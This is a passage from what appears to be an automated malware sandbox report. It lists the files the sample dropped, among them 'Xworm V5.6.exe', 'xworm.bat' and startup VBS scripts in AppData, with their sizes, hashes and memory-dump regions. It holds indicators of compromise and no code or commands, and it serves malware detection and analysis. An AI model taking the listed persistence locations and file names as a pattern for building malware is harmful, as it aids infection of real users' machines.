          b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\tmpA5EB.tmp
          Filesize

          116KB

          MD5

          f70aa3fa04f0536280f872ad17973c3d

          SHA1

          50a7b889329a92de1b272d0ecf5fce87395d3123

          SHA256

          8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

          SHA512

          30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\tmpA607.tmp
          Filesize

          96KB

          MD5

          d367ddfda80fdcf578726bc3b0bc3e3c

          SHA1

          23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

          SHA256

          0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

          SHA512

          40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Xworm V5.6.exe
          Filesize

          14.9MB

          MD5

          56ccb739926a725e78a7acf9af52c4bb

          SHA1

          5b01b90137871c3c8f0d04f510c4d56b23932cbc

          SHA256

          90f58865f265722ab007abb25074b3fc4916e927402552c6be17ef9afac96405

          SHA512

          2fee662bc4a1a36ce7328b23f991fa4a383b628839e403d6eb6a9533084b17699a6c939509867a86e803aafef2f9def98fa9305b576dad754aa7f599920c19a1

          Download Submit
        • C:\Users\Admin\AppData\Roaming\startup_str_256.vbs
          Filesize

          115B

          MD5

          1e1fb4978be450626368735642b24cf6

          SHA1

          4648de013017c5cbd173da217de6ba6f8daffe13

          SHA256

          225be32b3cb44f61d848b16e6304c1675c55582cd222d28ad8713b755f712d3b

          SHA512

          ecb0ef101c02369daddaab4fe2ea8bf970b2b25887c16e944ebf29681f38376d0e24aca19e1258ff1544394e3b6c95d5565c29aee3ba94f4188f9a0c114cc50a

          Download Submit
        • C:\Users\Admin\AppData\Roaming\startup_str_810.vbs
          Filesize

          115B

          MD5

          8add26512730c8e2a8a81a310074e3ab

          SHA1

          c56304923ea7d5996fc9b905edd80f4b49b6c101

          SHA256

          2f94e63e575f2d9feb58d719da8084c0c70269ee5cc138266a74d4924e791264

          SHA512

          e5d197f3842ed97b3828531f29ba0222a7f92103da1bddd5bf257b868af91aa8245726b4cc478df153672cc7ae54bfc6be3717283b2009358c35f918d47abc3b

          Download Submit
        • C:\Users\Admin\AppData\Roaming\xfixer.bat
          Filesize

          304KB

          MD5

          28a668375e0d2b1cfa1d847fc44934d4

          SHA1

          bd0d7df2f07f879e97e02d13d9eebf0a584fabe7

          SHA256

          cc3de81425f13eba2412c152f843351307b3d7f3cb9bd2da3d577ec5e36f8160

          SHA512

          d35dd9fd930f84f5cf1b042c828b6d2adc3007ff0042153f5f7fd45f8539f4155df8b07f59fe488ab3a03f2af4f8067b56c7276b3c80d3554d02ed930470689c

          Download Submit
        • C:\Users\Admin\AppData\Roaming\xworm.bat
          Filesize

          317KB

          MD5

          ada0b01d33911547bb0086e0ed152484

          SHA1

          ec81374c631f94c536b51dfb8c42c063bf72ca78

          SHA256

          aba89066a3bbc1addaaa48b4d209dac1e59138afb64c797bf950d286e8e826a1

          SHA512

          6aba80c863169fe3a244e20c6d9cfc13f8f69ff81a8402327603f46700a2798d19d1347f0c34e9301cac9aeec0ae5ae9adc76f571dddb9fdbfac6c23de3aae26

          Download Submit
        • C:\Users\Admin\AppData\Roaming\xworm.bat.exe
          Filesize

          423KB

          MD5

          c32ca4acfcc635ec1ea6ed8a34df5fac

          SHA1

          f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

          SHA256

          73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

          SHA512

          6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          Download Submit
        • memory/228-247-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/544-90-0x0000000007300000-0x0000000007554000-memory.dmp
          Filesize

          2.3MB

          Download
        • memory/920-170-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/1120-362-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/1304-85-0x00000000078E0000-0x0000000007B32000-memory.dmp
          Filesize

          2.3MB

          Download
        • memory/1652-324-0x00000000088D0000-0x0000000008946000-memory.dmp
          Filesize

          472KB

          Download
        • memory/1652-272-0x00000000053F0000-0x000000000540E000-memory.dmp
          Filesize

          120KB

          Download
        • memory/1652-273-0x0000000008AA0000-0x00000000090B8000-memory.dmp
          Filesize

          6.1MB

          Download
        • memory/1652-274-0x0000000007C10000-0x0000000007C22000-memory.dmp
          Filesize

          72KB

          Download
        • memory/1652-275-0x0000000007C70000-0x0000000007CAC000-memory.dmp
          Filesize

          240KB

          Download
        • memory/1652-276-0x0000000008480000-0x000000000858A000-memory.dmp
          Filesize

          1.0MB

          Download
        • memory/1652-311-0x00000000090C0000-0x0000000009282000-memory.dmp
          Filesize

          1.8MB

          Download
        • memory/1652-312-0x00000000097C0000-0x0000000009CEC000-memory.dmp
          Filesize

          5.2MB

          Download
        • memory/1652-325-0x00000000089F0000-0x0000000008A82000-memory.dmp
          Filesize

          584KB

          Download
        • memory/1652-326-0x000000000A2A0000-0x000000000A844000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/1652-327-0x00000000092F0000-0x000000000930E000-memory.dmp
          Filesize

          120KB

          Download
        • memory/1836-37-0x000001E2E3BE0000-0x000001E2E4AC8000-memory.dmp
          Filesize

          14.9MB

          Download
        • memory/1948-313-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/1948-323-0x0000000007900000-0x00000000079A3000-memory.dmp
          Filesize

          652KB

          Download
        • memory/1948-350-0x0000000007C20000-0x0000000007C34000-memory.dmp
          Filesize

          80KB

          Download
        • memory/1948-328-0x0000000007BE0000-0x0000000007BF1000-memory.dmp
          Filesize

          68KB

          Download
        • memory/2460-6-0x000000007374E000-0x000000007374F000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2460-88-0x0000000007D30000-0x0000000007D4A000-memory.dmp
          Filesize

          104KB

          Download
        • memory/2460-94-0x0000000073740000-0x0000000073EF0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/2460-7-0x00000000030F0000-0x0000000003126000-memory.dmp
          Filesize

          216KB

          Download
        • memory/2460-12-0x0000000005810000-0x0000000005E38000-memory.dmp
          Filesize

          6.2MB

          Download
        • memory/2460-57-0x0000000006CA0000-0x0000000006CD2000-memory.dmp
          Filesize

          200KB

          Download
        • memory/2460-89-0x0000000007C80000-0x0000000007C88000-memory.dmp
          Filesize

          32KB

          Download
        • memory/2460-69-0x00000000078D0000-0x0000000007973000-memory.dmp
          Filesize

          652KB

          Download
        • memory/2460-86-0x0000000007C50000-0x0000000007C64000-memory.dmp
          Filesize

          80KB

          Download
        • memory/2460-84-0x0000000007C40000-0x0000000007C4E000-memory.dmp
          Filesize

          56KB

          Download
        • memory/2460-83-0x0000000007C00000-0x0000000007C11000-memory.dmp
          Filesize

          68KB

          Download
        • memory/2460-82-0x0000000007C90000-0x0000000007D26000-memory.dmp
          Filesize

          600KB

          Download
        • memory/2460-18-0x0000000073740000-0x0000000073EF0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/2460-11-0x0000000073740000-0x0000000073EF0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/2460-20-0x0000000005710000-0x0000000005732000-memory.dmp
          Filesize

          136KB

          Download
        • memory/2460-21-0x0000000005FF0000-0x0000000006056000-memory.dmp
          Filesize

          408KB

          Download
        • memory/2460-81-0x0000000007A70000-0x0000000007A7A000-memory.dmp
          Filesize

          40KB

          Download
        • memory/2460-79-0x0000000008040000-0x00000000086BA000-memory.dmp
          Filesize

          6.5MB

          Download
        • memory/2460-80-0x0000000007A00000-0x0000000007A1A000-memory.dmp
          Filesize

          104KB

          Download
        • memory/2460-23-0x0000000006060000-0x00000000060C6000-memory.dmp
          Filesize

          408KB

          Download
        • memory/2460-36-0x00000000060D0000-0x0000000006424000-memory.dmp
          Filesize

          3.3MB

          Download
        • memory/2460-38-0x00000000066D0000-0x00000000066EE000-memory.dmp
          Filesize

          120KB

          Download
        • memory/2460-39-0x0000000006720000-0x000000000676C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/2460-68-0x0000000006CE0000-0x0000000006CFE000-memory.dmp
          Filesize

          120KB

          Download
        • memory/2460-58-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/2712-268-0x0000000004810000-0x0000000004826000-memory.dmp
          Filesize

          88KB

          Download
        • memory/2712-555-0x0000000008FA0000-0x00000000090BE000-memory.dmp
          Filesize

          1.1MB

          Download
        • memory/2712-269-0x0000000006FF0000-0x000000000708C000-memory.dmp
          Filesize

          624KB

          Download
        • memory/2712-554-0x00000000080B0000-0x00000000080BE000-memory.dmp
          Filesize

          56KB

          Download
        • memory/2712-549-0x0000000007C00000-0x0000000007C0A000-memory.dmp
          Filesize

          40KB

          Download
        • memory/2876-257-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/3340-287-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/3340-299-0x0000000007EA0000-0x0000000007EB4000-memory.dmp
          Filesize

          80KB

          Download
        • memory/3340-297-0x0000000007AF0000-0x0000000007B93000-memory.dmp
          Filesize

          652KB

          Download
        • memory/3340-298-0x0000000007E60000-0x0000000007E71000-memory.dmp
          Filesize

          68KB

          Download
        • memory/4596-125-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/4612-537-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/4796-115-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/4932-169-0x0000000007A70000-0x0000000007B13000-memory.dmp
          Filesize

          652KB

          Download
        • memory/4932-180-0x0000000007DB0000-0x0000000007DC1000-memory.dmp
          Filesize

          68KB

          Download
        • memory/4932-159-0x0000000075300000-0x000000007534C000-memory.dmp
          Filesize

          304KB

          Download